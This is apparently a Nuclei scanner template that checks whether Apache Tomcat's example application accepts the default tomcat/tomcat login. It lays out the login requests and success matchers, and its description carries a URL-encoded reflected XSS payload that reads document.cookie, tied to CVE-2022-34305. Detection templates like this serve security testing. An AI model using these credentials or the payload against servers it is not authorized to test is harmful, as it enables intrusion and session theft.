id: tomcat-examples-login

info:
  name: Tomcat Examples Default Login
  author: 0xelkomy & C0NQR0R
  severity: info
  description: |
    Default credentials are accepted, and there is an XSS at /examples/jsp/security/protected/index.jsp?dataName=%22%3E%3Cimg+src%3Dd+onerror%3Dalert%28document.cookie%29%3E&dataValue= that is reachable after you log in.
  reference:
    - https://c0nqr0r.github.io/CVE-2022-34305/
  metadata:
    verified: true
  tags: default-login,tomcat

requests:
  - raw:
      # Request 1: ask for the protected page first so the container starts
      # a session and presents the form login.
      - |
        GET /examples/jsp/security/protected/index.jsp HTTP/1.1
        Host: {{Hostname}}

      # Request 2: submit the credentials to the form-login endpoint.
      - |
        POST /examples/jsp/security/protected/j_security_check HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        j_username={{username}}&j_password={{password}}

    # pitchfork pairs the n-th username with the n-th password.
    attack: pitchfork
    payloads:
      username:
        - tomcat
      password:
        - tomcat

    redirects: true
    max-redirects: 2
    # Keep the session cookie from request 1 for the login in request 2.
    cookie-reuse: true

    # Both words must appear in the response body for a match.
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "You are logged in as remote user"
          - "{{username}}"
        condition: and